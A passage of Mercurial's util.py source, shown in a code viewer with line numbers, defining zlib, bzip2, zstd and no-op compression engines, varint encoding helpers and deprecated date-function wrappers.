3606 3609 parts.append(z.compress(data[pos:pos2]))
3607 3610 pos = pos2
3608 3611 parts.append(z.flush())
3609 3612
3610 3613 if sum(map(len, parts)) < insize:
3611 3614 return ''.join(parts)
3612 3615 return None
3613 3616
3614 3617 def decompress(self, data):
3615 3618 try:
3616 3619 return zlib.decompress(data)
3617 3620 except zlib.error as e:
3618 3621 raise error.RevlogError(_('revlog decompress error: %s') %
3619 3622 forcebytestr(e))
3620 3623
3621 3624 def revlogcompressor(self, opts=None):
3622 3625 return self.zlibrevlogcompressor()
3623 3626
3624 3627 compengines.register(_zlibengine())
3625 3628
3626 3629 class _bz2engine(compressionengine):
3627 3630 def name(self):
3628 3631 return 'bz2'
3629 3632
3630 3633 def bundletype(self):
3631 3634 """An algorithm that produces smaller bundles than ``gzip``.
3632 3635
3633 3636 All Mercurial clients should support this format.
3634 3637
3635 3638 This engine will likely produce smaller bundles than ``gzip`` but
3636 3639 will be significantly slower, both during compression and
3637 3640 decompression.
3638 3641
3639 3642 If available, the ``zstd`` engine can yield similar or better
3640 3643 compression at much higher speeds.
3641 3644 """
3642 3645 return 'bzip2', 'BZ'
3643 3646
3644 3647 # We declare a protocol name but don't advertise by default because
3645 3648 # it is slow.
3646 3649 def wireprotosupport(self):
3647 3650 return compewireprotosupport('bzip2', 0, 0)
3648 3651
3649 3652 def compressstream(self, it, opts=None):
3650 3653 opts = opts or {}
3651 3654 z = bz2.BZ2Compressor(opts.get('level', 9))
3652 3655 for chunk in it:
3653 3656 data = z.compress(chunk)
3654 3657 if data:
3655 3658 yield data
3656 3659
3657 3660 yield z.flush()
3658 3661
3659 3662 def decompressorreader(self, fh):
3660 3663 def gen():
3661 3664 d = bz2.BZ2Decompressor()
3662 3665 for chunk in filechunkiter(fh):
3663 3666 yield d.decompress(chunk)
3664 3667
3665 3668 return chunkbuffer(gen())
3666 3669
3667 3670 compengines.register(_bz2engine())
3668 3671
3669 3672 class _truncatedbz2engine(compressionengine):
3670 3673 def name(self):
3671 3674 return 'bz2truncated'
3672 3675
3673 3676 def bundletype(self):
3674 3677 return None, '_truncatedBZ'
3675 3678
3676 3679 # We don't implement compressstream because it is hackily handled elsewhere.
3677 3680
3678 3681 def decompressorreader(self, fh):
3679 3682 def gen():
3680 3683 # The input stream doesn't have the 'BZ' header. So add it back.
3681 3684 d = bz2.BZ2Decompressor()
3682 3685 d.decompress('BZ')
3683 3686 for chunk in filechunkiter(fh):
3684 3687 yield d.decompress(chunk)
3685 3688
3686 3689 return chunkbuffer(gen())
3687 3690
3688 3691 compengines.register(_truncatedbz2engine())
3689 3692
3690 3693 class _noopengine(compressionengine):
3691 3694 def name(self):
3692 3695 return 'none'
3693 3696
3694 3697 def bundletype(self):
3695 3698 """No compression is performed.
3696 3699
3697 3700 Use this compression engine to explicitly disable compression.
3698 3701 """
3699 3702 return 'none', 'UN'
3700 3703
3701 3704 # Clients always support uncompressed payloads. Servers don't because
3702 3705 # unless you are on a fast network, uncompressed payloads can easily
3703 3706 # saturate your network pipe.
3704 3707 def wireprotosupport(self):
3705 3708 return compewireprotosupport('none', 0, 10)
3706 3709
3707 3710 # We don't implement revlogheader because it is handled specially
3708 3711 # in the revlog class.
3709 3712
3710 3713 def compressstream(self, it, opts=None):
3711 3714 return it
3712 3715
3713 3716 def decompressorreader(self, fh):
3714 3717 return fh
3715 3718
3716 3719 class nooprevlogcompressor(object):
3717 3720 def compress(self, data):
3718 3721 return None
3719 3722
3720 3723 def revlogcompressor(self, opts=None):
3721 3724 return self.nooprevlogcompressor()
3722 3725
3723 3726 compengines.register(_noopengine())
3724 3727
3725 3728 class _zstdengine(compressionengine):
3726 3729 def name(self):
3727 3730 return 'zstd'
3728 3731
3729 3732 @propertycache
3730 3733 def _module(self):
3731 3734 # Not all installs have the zstd module available. So defer importing
3732 3735 # until first access.
3733 3736 try:
3734 3737 from . import zstd
3735 3738 # Force delayed import.
3736 3739 zstd.__version__
3737 3740 return zstd
3738 3741 except ImportError:
3739 3742 return None
3740 3743
3741 3744 def available(self):
3742 3745 return bool(self._module)
3743 3746
3744 3747 def bundletype(self):
3745 3748 """A modern compression algorithm that is fast and highly flexible.
3746 3749
3747 3750 Only supported by Mercurial 4.1 and newer clients.
3748 3751
3749 3752 With the default settings, zstd compression is both faster and yields
3750 3753 better compression than ``gzip``. It also frequently yields better
3751 3754 compression than ``bzip2`` while operating at much higher speeds.
3752 3755
3753 3756 If this engine is available and backwards compatibility is not a
3754 3757 concern, it is likely the best available engine.
3755 3758 """
3756 3759 return 'zstd', 'ZS'
3757 3760
3758 3761 def wireprotosupport(self):
3759 3762 return compewireprotosupport('zstd', 50, 50)
3760 3763
3761 3764 def revlogheader(self):
3762 3765 return '\x28'
3763 3766
3764 3767 def compressstream(self, it, opts=None):
3765 3768 opts = opts or {}
3766 3769 # zstd level 3 is almost always significantly faster than zlib
3767 3770 # while providing no worse compression. It strikes a good balance
3768 3771 # between speed and compression.
3769 3772 level = opts.get('level', 3)
3770 3773
3771 3774 zstd = self._module
3772 3775 z = zstd.ZstdCompressor(level=level).compressobj()
3773 3776 for chunk in it:
3774 3777 data = z.compress(chunk)
3775 3778 if data:
3776 3779 yield data
3777 3780
3778 3781 yield z.flush()
3779 3782
3780 3783 def decompressorreader(self, fh):
3781 3784 zstd = self._module
3782 3785 dctx = zstd.ZstdDecompressor()
3783 3786 return chunkbuffer(dctx.read_from(fh))
3784 3787
3785 3788 class zstdrevlogcompressor(object):
3786 3789 def __init__(self, zstd, level=3):
3787 3790 # Writing the content size adds a few bytes to the output. However,
3788 3791 # it allows decompression to be more optimal since we can
3789 3792 # pre-allocate a buffer to hold the result.
3790 3793 self._cctx = zstd.ZstdCompressor(level=level,
3791 3794 write_content_size=True)
3792 3795 self._dctx = zstd.ZstdDecompressor()
3793 3796 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3794 3797 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3795 3798
3796 3799 def compress(self, data):
3797 3800 insize = len(data)
3798 3801 # Caller handles empty input case.
3799 3802 assert insize > 0
3800 3803
3801 3804 if insize < 50:
3802 3805 return None
3803 3806
3804 3807 elif insize <= 1000000:
3805 3808 compressed = self._cctx.compress(data)
3806 3809 if len(compressed) < insize:
3807 3810 return compressed
3808 3811 return None
3809 3812 else:
3810 3813 z = self._cctx.compressobj()
3811 3814 chunks = []
3812 3815 pos = 0
3813 3816 while pos < insize:
3814 3817 pos2 = pos + self._compinsize
3815 3818 chunk = z.compress(data[pos:pos2])
3816 3819 if chunk:
3817 3820 chunks.append(chunk)
3818 3821 pos = pos2
3819 3822 chunks.append(z.flush())
3820 3823
3821 3824 if sum(map(len, chunks)) < insize:
3822 3825 return ''.join(chunks)
3823 3826 return None
3824 3827
3825 3828 def decompress(self, data):
3826 3829 insize = len(data)
3827 3830
3828 3831 try:
3829 3832 # This was measured to be faster than other streaming
3830 3833 # decompressors.
3831 3834 dobj = self._dctx.decompressobj()
3832 3835 chunks = []
3833 3836 pos = 0
3834 3837 while pos < insize:
3835 3838 pos2 = pos + self._decompinsize
3836 3839 chunk = dobj.decompress(data[pos:pos2])
3837 3840 if chunk:
3838 3841 chunks.append(chunk)
3839 3842 pos = pos2
3840 3843 # Frame should be exhausted, so no finish() API.
3841 3844
3842 3845 return ''.join(chunks)
3843 3846 except Exception as e:
3844 3847 raise error.RevlogError(_('revlog decompress error: %s') %
3845 3848 forcebytestr(e))
3846 3849
3847 3850 def revlogcompressor(self, opts=None):
3848 3851 opts = opts or {}
3849 3852 return self.zstdrevlogcompressor(self._module,
3850 3853 level=opts.get('level', 3))
3851 3854
3852 3855 compengines.register(_zstdengine())
3853 3856
3854 3857 def bundlecompressiontopics():
3855 3858 """Obtains a list of available bundle compressions for use in help."""
3856 3859 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3857 3860 items = {}
3858 3861
3859 3862 # We need to format the docstring. So use a dummy object/type to hold it
3860 3863 # rather than mutating the original.
3861 3864 class docobject(object):
3862 3865 pass
3863 3866
3864 3867 for name in compengines:
3865 3868 engine = compengines[name]
3866 3869
3867 3870 if not engine.available():
3868 3871 continue
3869 3872
3870 3873 bt = engine.bundletype()
3871 3874 if not bt or not bt[0]:
3872 3875 continue
3873 3876
3874 3877 doc = pycompat.sysstr('``%s``\n %s') % (
3875 3878 bt[0], engine.bundletype.__doc__)
3876 3879
3877 3880 value = docobject()
3878 3881 value.__doc__ = doc
3879 3882 value._origdoc = engine.bundletype.__doc__
3880 3883 value._origfunc = engine.bundletype
3881 3884
3882 3885 items[bt[0]] = value
3883 3886
3884 3887 return items
3885 3888
3886 3889 i18nfunctions = bundlecompressiontopics().values()
3887 3890
3888 3891 # convenient shortcut
3889 3892 dst = debugstacktrace
3890 3893
3891 3894 def safename(f, tag, ctx, others=None):
3892 3895 """
3893 3896 Generate a name that it is safe to rename f to in the given context.
3894 3897
3895 3898 f: filename to rename
3896 3899 tag: a string tag that will be included in the new name
3897 3900 ctx: a context, in which the new name must not exist
3898 3901 others: a set of other filenames that the new name must not be in
3899 3902
3900 3903 Returns a file name of the form oldname~tag[~number] which does not exist
3901 3904 in the provided context and is not in the set of other names.
3902 3905 """
3903 3906 if others is None:
3904 3907 others = set()
3905 3908
3906 3909 fn = '%s~%s' % (f, tag)
3907 3910 if fn not in ctx and fn not in others:
3908 3911 return fn
3909 3912 for n in itertools.count(1):
3910 3913 fn = '%s~%s~%s' % (f, tag, n)
3911 3914 if fn not in ctx and fn not in others:
3912 3915 return fn
3913 3916
3914 3917 def readexactly(stream, n):
3915 3918 '''read n bytes from stream.read and abort if less was available'''
3916 3919 s = stream.read(n)
3917 3920 if len(s) < n:
3918 3921 raise error.Abort(_("stream ended unexpectedly"
3919 3922 " (got %d bytes, expected %d)")
3920 3923 % (len(s), n))
3921 3924 return s
3922 3925
3923 3926 def uvarintencode(value):
3924 3927 """Encode an unsigned integer value to a varint.
3925 3928
3926 3929 A varint is a variable length integer of 1 or more bytes. Each byte
3927 3930 except the last has the most significant bit set. The lower 7 bits of
3928 3931 each byte store the 2's complement representation, least significant group
3929 3932 first.
3930 3933
3931 3934 >>> uvarintencode(0)
3932 3935 '\\x00'
3933 3936 >>> uvarintencode(1)
3934 3937 '\\x01'
3935 3938 >>> uvarintencode(127)
3936 3939 '\\x7f'
3937 3940 >>> uvarintencode(1337)
3938 3941 '\\xb9\\n'
3939 3942 >>> uvarintencode(65536)
3940 3943 '\\x80\\x80\\x04'
3941 3944 >>> uvarintencode(-1)
3942 3945 Traceback (most recent call last):
3943 3946 ...
3944 3947 ProgrammingError: negative value for uvarint: -1
3945 3948 """
3946 3949 if value < 0:
3947 3950 raise error.ProgrammingError('negative value for uvarint: %d'
3948 3951 % value)
3949 3952 bits = value & 0x7f
3950 3953 value >>= 7
3951 3954 bytes = []
3952 3955 while value:
3953 3956 bytes.append(pycompat.bytechr(0x80 | bits))
3954 3957 bits = value & 0x7f
3955 3958 value >>= 7
3956 3959 bytes.append(pycompat.bytechr(bits))
3957 3960
3958 3961 return ''.join(bytes)
3959 3962
3960 3963 def uvarintdecodestream(fh):
3961 3964 """Decode an unsigned variable length integer from a stream.
3962 3965
3963 3966 The passed argument is anything that has a ``.read(N)`` method.
3964 3967
3965 3968 >>> try:
3966 3969 ... from StringIO import StringIO as BytesIO
3967 3970 ... except ImportError:
3968 3971 ... from io import BytesIO
3969 3972 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3970 3973 0
3971 3974 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3972 3975 1
3973 3976 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3974 3977 127
3975 3978 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3976 3979 1337
3977 3980 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3978 3981 65536
3979 3982 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3980 3983 Traceback (most recent call last):
3981 3984 ...
3982 3985 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3983 3986 """
3984 3987 result = 0
3985 3988 shift = 0
3986 3989 while True:
3987 3990 byte = ord(readexactly(fh, 1))
3988 3991 result |= ((byte & 0x7f) << shift)
3989 3992 if not (byte & 0x80):
3990 3993 return result
3991 3994 shift += 7
3992 3995
3993 3996 ###
3994 3997 # Deprecation warnings for util.py splitting
3995 3998 ###
3996 3999
3997 4000 defaultdateformats = dateutil.defaultdateformats
3998 4001
3999 4002 extendeddateformats = dateutil.extendeddateformats
4000 4003
4001 4004 def makedate(*args, **kwargs):
4002 4005 msg = ("'util.makedate' is deprecated, "
4003 4006 "use 'utils.dateutil.makedate'")
4004 4007 nouideprecwarn(msg, "4.6")
4005 4008 return dateutil.makedate(*args, **kwargs)
4006 4009
4007 4010 def datestr(*args, **kwargs):
4008 4011 msg = ("'util.datestr' is deprecated, "
4009 4012 "use 'utils.dateutil.datestr'")
4010 4013 nouideprecwarn(msg, "4.6")
4011 4014 debugstacktrace()
4012 4015 return dateutil.datestr(*args, **kwargs)
4013 4016
4014 4017 def shortdate(*args, **kwargs):
4015 4018 msg = ("'util.shortdate' is deprecated, "
4016 4019 "use 'utils.dateutil.shortdate'")
4017 4020 nouideprecwarn(msg, "4.6")
4018 4021 return dateutil.shortdate(*args, **kwargs)
4019 4022
4020 4023 def parsetimezone(*args, **kwargs):
4021 4024 msg = ("'util.parsetimezone' is deprecated, "
4022 4025 "use 'utils.dateutil.parsetimezone'")
4023 4026 nouideprecwarn(msg, "4.6")
4024 4027 return dateutil.parsetimezone(*args, **kwargs)
4025 4028
4026 4029 def strdate(*args, **kwargs):
4027 4030 msg = ("'util.strdate' is deprecated, "
4028 4031 "use 'utils.dateutil.strdate'")
4029 4032 nouideprecwarn(msg, "4.6")
4030 4033 return dateutil.strdate(*args, **kwargs)
4031 4034
4032 4035 def parsedate(*args, **kwargs):
4033 4036 msg = ("'util.parsedate' is deprecated, "
4034 4037 "use 'utils.dateutil.parsedate'")
4035 4038 nouideprecwarn(msg, "4.6")
4036 4039 return dateutil.parsedate(*args, **kwargs)
4037 4040
4038 4041 def matchdate(*args, **kwargs):
4039 4042 msg = ("'util.matchdate' is deprecated, "
4040 4043 "use 'utils.dateutil.matchdate'")
4041 4044 nouideprecwarn(msg, "4.6")
4042 4045 return dateutil.matchdate(*args, **kwargs)
General Comments 0
You need to be logged in to leave comments. Login now